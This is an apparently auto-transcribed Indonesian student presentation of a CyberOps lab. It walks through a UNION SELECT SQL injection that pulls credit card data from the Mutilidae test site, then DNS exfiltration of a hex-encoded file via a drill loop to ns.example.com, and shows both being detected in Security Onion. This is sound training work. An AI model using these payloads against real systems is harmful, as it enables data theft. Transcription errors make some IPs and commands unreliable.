Saya akan menjelaskan untuk part berikutnya. Pertama, interpret HTTP dan INS data untuk isolasi threat actor. Pertama, kita diminta untuk mempersiapkan virtual environment. Pertama, kita masuk ke CyberOps Workstation. Baru di workstation mesinnya CyberOps. Sebelumnya kita start dulu CyberOps Workstation. Nah, kita masuk ke network. Sekarang kita masuk ke machine, setting, dan kita pergi ke network. Kemudian di sebelah attach to kita ganti ke internal network seperti yang sudah ditunjukkan. Kemudian kita klik OK. Dan untuk part selanjutnya kita diminta untuk start CyberOps Workstation kali Data Studio Table dan Security Onion. Yuk. Setelah kita membuka semuanya, kita masuk ke CyberOps Workstation untuk configure static.sh menggunakan command sudo lab superfiles garing script garing configure static.sh seperti di contoh. Menggunakan password CyberOps, IP configuration successful. Selanjutnya kita masuk ke security onion virtual machine. Di dalam security onion, kemudian di desktop kita klik kanan dan open terminal. Kita masuk ke terminal dan kita masukkan sudo service npm status. Nah, seperti yang terlihat, ini adalah hasil dari file tersebut. Sekarang untuk part 8 kita akan investigate an SQL injection attack. Untuk yang pertama, perform an SQL injection. Kita masuk ke kali virtual machine dengan username root dan password CyberOps. Di dalam kali virtual machine kita pakai Firefox. Karena kita buka Firefox di dalam untuk membuka web browser baru. Sekarang kita navigate ke 209.1.165.200.235. Nah, sekarang kita pergi ke Mutilidae untuk mengakses website yang vulnerable. Kemudian kita klik OEASP, OEASP top 10, A1 injection, SQLi, extract data, dan user info. Kemudian kita right click di bagian field name dan inspect element.
Nah, setelah terbuka di dalam username field, double klik nomor 20 dan ganti ke 100 agar kita bisa melihat string yang lebih panjang. Setelah sudah, kita enter union select CCID, CC number, CCU expiration, null from credit cards di dalam field nama. Null from credit underscore cards, cards double dash. Kemudian kita klik view account details. Pergi ke exact credit card information. Nah, sekarang kita diminta untuk scroll down the page for the result. Nah, di situ kita bisa melihat bagian result seperti pada contoh ada username dan password-passwordnya. Kemudian step 2 kita minta untuk review the well logs. Pertama kita pergi ke security onion virtual machine. Kemudian kita select all to monitor. Kita double klik the SGUEL icon di desktop. GUEL di bawah, yang kedua dari bawah di desktop di bagian layar. X kan X bukan itu. Kemudian kita menggunakan username analis dan password CyberOps ketika menunya sudah keluar. Kita klik OK. Dan dalam SQL console kita dalam pojok kanan bawah kita klik show paket data di pojok kanan bawah, sorong ke kanan sebesar. Nah, pertama kita select all dulu, kemudian kita klik start SQL. Nah, setelah itu kita pergi ke pojok kanan bawah dan show paket data dan show rule. Lihat detail dari alert yang terpilih. Setelah itu kita search for alert related to ET web server possible SQL injection attempt union select.
ETH web_underscore server spasi possible SQL injection attempt. Tab union select. Dan klik alert yang dimulai dari 7. Setelah itu kita right click pada nomor di bawah CNT heading yang terpilih untuk melihat semua related alerts. Kita select view correlated events. Kita lanjut, kita right click alert ID dalam hasilnya, kemudian select transcript. Select transcript untuk melihat detail dari alert ini. Jadi akan menunjukkan hasil seperti itu, tapi sekarang lagi banyak traffic. Kita lanjut. Part G, dalam window ini kita bisa melihat gate statement using the union operator yang digunakan untuk mengakses credit card information. Ya, seperti yang terlihat pada contoh di bagian atas. Dan itu adalah hasilnya. Dan kami mendapatkan jawaban transkrip window menampilkan transaksi antara sumber dari 209.165.201.17.47.144 dan tujuannya. Transkrip menunjukkan bahwa kedua ini mencoba mengakses informasi kartu kredit menggunakan operator SQL Union. Kita lanjut, part H. Kita juga bisa mendeterminankan informasi yang diambil dari penyerang untuk di klik search dan isi username di dalam find field dan menggunakan find button untuk melokasikan informasi yang ditangkap. Seperti pada contoh di bawahnya. Nah, dari sini kita mendapatkan jawaban informasi kartu kredit sama karena transkrip menunjukkan semua konten yang dikirim antara sumber dan tujuan. Kita close saja yang sudah dan kita kembali ke SGUIL window dan right click the same ID alert ID that contains expired credit card information dan pilih Wireshark. Klik kanan di alert ID. Di angka alert ID. Dan klik kanan dan pilih Wireshark. Isinya lagi berat. Seperti yang bisa dilihat di laporan juga, kalau kita mengklik follow TCP stream, kita akan mendapatkan get request dan expired data yang akan ditampilkan di TCP stream window. Kita bisa output beberapa dari figur yang di bawah ini, tapi ini harusnya mengandung informasi dari kartu kredit yang sama dari yang sudah kita transkrip di atas. Selanjutnya part di bagian M, di waktu ini kita bisa melihat bahwa share data yang kita simpan di save as TCP stream window, kita bisa juga simpan di Wireshark PCAP file yang bisa kita dokumentasikan source dan destination IP addresses dan port dan juga waktu insiden dan protokol yang digunakan untuk menganalisis di analis tier 2. Selanjutnya kita lanjut part A. Dari security onion virtual machine kita bisa memulai Elsa dari desktop dan menerima message your connection is not private. Kita bisa klik advance dan klik proceed to localhost. Walaupun unsafe, kita lanjutkan saja login dengan username analis dan password CyberOps.
Di bagian kiri panel kita bisa memilih HTTP top, potential SQL injection, dan select 209.165.200.235. Dan untuk part E, kita bisa klik info dari entry terakhir dan informasi ini related atau memiliki relasi dari SQL injection yang sukses. Kita bisa melihat union query yang digunakan di dalam attack. Kemudian kita untuk part F kita bisa klik plugin get PCAP, enter username, analis dan password CyberOps ketika keluar dan klik submit jika diperlukan. CapMe adalah web interface yang mengizinkan kita untuk mendapatkan PCAP transkrip dan download PCAP tersebut. Dan untuk part G kita bisa melihat bahwa PCAP transkrip tersebut itu dirender menggunakan TCP flow dan halaman ini juga memberikan link untuk akses PCAP file tersebut. Kita juga bisa mencari informasi username dengan cara ketik tekan Ctrl F untuk open file, kemudian di logboxnya dan kita bisa enter username di dalam field. Jadi kita bisa melihat dan melokasikan bahwa informasi kartu kredit yang kita tunjukkan dalam SQL injection. Untuk part 9, data exfiltration menggunakan DNS. Untuk step pertama, kita diminta untuk convert a text file using a hexadecimal file. Pertama, kita diminta untuk membuka di dalam CyberOps Workstation. Kita pergi ke Home Analysis Lab Support File untuk memverifikasikan confidential text file ada di dalam directory. Seperti berikut ini. Ya, ada dalam directory. Kemudian kita bisa menampilkan konten dari confidential.txt file dengan menggunakan command more. Nah, selanjutnya kita di xxd command yang digunakan untuk membuat hexdump atau convert sebuah hexdump kembali ke binary untuk mentransform kembali konten dari confidential.txt kembali ke 60 byte panjang 60 byte hex string dan menyimpannya ke confidential.hex. Kita menggunakan command xxd-p confidential.txt anak panakanan confidential.hex. Nah, part selanjutnya dalam di sini juga dijelaskan bahwa option -p itu digunakan untuk format output dari PostScript format dan anak panah itu digunakan untuk meredirect output ke confidential.hex. Nah, untuk part selanjutnya kita diminta untuk verifikasi konten dari confidential.hex dengan command cat confidential.hex. Akan menunjukkan hasil seperti ini dengan beberapa angka kode binary. Dan untuk selanjutnya kita minta untuk verifikasi bahwa CyberOps Workstation telah sampai sekarang mengkonfigurasi menggunakan local DNS resolver pada IP address 209.165.200.235 dan kita bisa menggunakan command cat garing etc garing resolve.conf untuk menampilkan hasil dari name server tersebut. Nah, untuk step selanjutnya, step 2, kita akan prepend the content to DNS query log. Nah, di sini kita diminta untuk run a bash shell for loop yang akan menunjukkan confidential.hex file yang akan menambah setiap line dari hex string ke nama target domain atau name server ns.example.com. Sebuah DNS query yang diperform dari setiap line ini akan terlihat seperti line pada contoh di bawah ini. Nah, kita lanjut saja. Kalau kita menggunakan for line in cat confidential.hex do drill $line.ns.example.com semicolon done akan menunjukkan hasil seperti ini. Untuk step 3 kita bisa exfiltrate the DNS query log menggunakan command ssh user at 209.200.235 untuk menunjukkan uh, variable dari library bind dan query log. Nah, untuk selanjutnya B, kita bisa menggunakan command egrep to parse the DNS query log file.
Akan komen EGR EP-0 dalam kurung kotak 0 sampai 9A garis F bintang .nsexample.com dengan direktorinya cat dash d titik dash f1 garis unik anak-anak secret.hex. Kita bisa melihat hasil seperti berikut ini. Di bagian C ditunjukkan display dari hex file menggunakan command cat. Di D kita bisa exit menggunakan command exit dan menggunakan secure copy SCP untuk copy secret.hex file dari metasploitable virtual machine ke Kali dengan user sebagai password dan si user sebagai password ketika keluar. Ini bisa mengambil beberapa menit dengan menggunakan command ini. Kita juga bisa copy file tersebut. Untuk part F kita bisa memverifikasi bahwa file sudah berhasil di copy ke Kali virtual machine, dan untuk part G kita akan mengembalikan hexdump untuk menampilkannya yang konten dari exfiltrated file secret.hex ke XSD command dengan dash R atau dash P option seperti ini. Selanjutnya, ketika sudah, kita diminta untuk verifikasi konten dari secret.txt file adalah sama dengan confidential.txt file dari CyberOps Workstation virtual machine dengan menggunakan command cat secret.txt. Nah, sekarang kita bisa power down the CyberOps Workstation metasploitable dan kali. Kita bisa. Yang keempat, kita diminta untuk menganalisis the exfiltration DNS. Pertama, kita diminta login ke Security Onion untuk memulai ELSA dari desktop. Dan jika kita menerima message your connection is not private, klik advance untuk melanjutkan dan proceed to localhost dan save dan tetap lanjutkan saja jika memiliki menu seperti itu. Dan untuk part B, dari ELSA query kita bisa klik DNS garis bottom di request sebelah kiri. Ini akan mengembalikan semua rekor dari semua DNS request yang tersorted. Jadi setidaknya frequent yang paling baru itu untuk tampil paling pertama. Kita bisa scroll down untuk melihat hasil dari beberapa query dari ns.example. Seperti pada contoh di bawah ini, kita lanjut part C. Kita memilih salah satu link, baru copy 63 byte string ya untuk ns.example.com. Untuk part D kita diminta untuk membuka terminal window, menggunakan echo dan xxt command untuk revert the hex string, dan dash n option itu digunakan untuk mencegah output to trailing new line. Nah, dengan menggunakan command echo dash n dengan kode binary di bawah ini seperti pada contoh, kita bisa mendapatkan hasil bahwa ini merupakan sebuah dokumen confidential. Kita juga ditanya jika kita melanjutkan untuk revert the hex string, apakah hasilnya? Untuk jawabannya adalah dokumen ini berisi informasi tentang pelanggaran keamanan terakhir. Demikianlah presentasi dari kelompok kami. Terima kasih.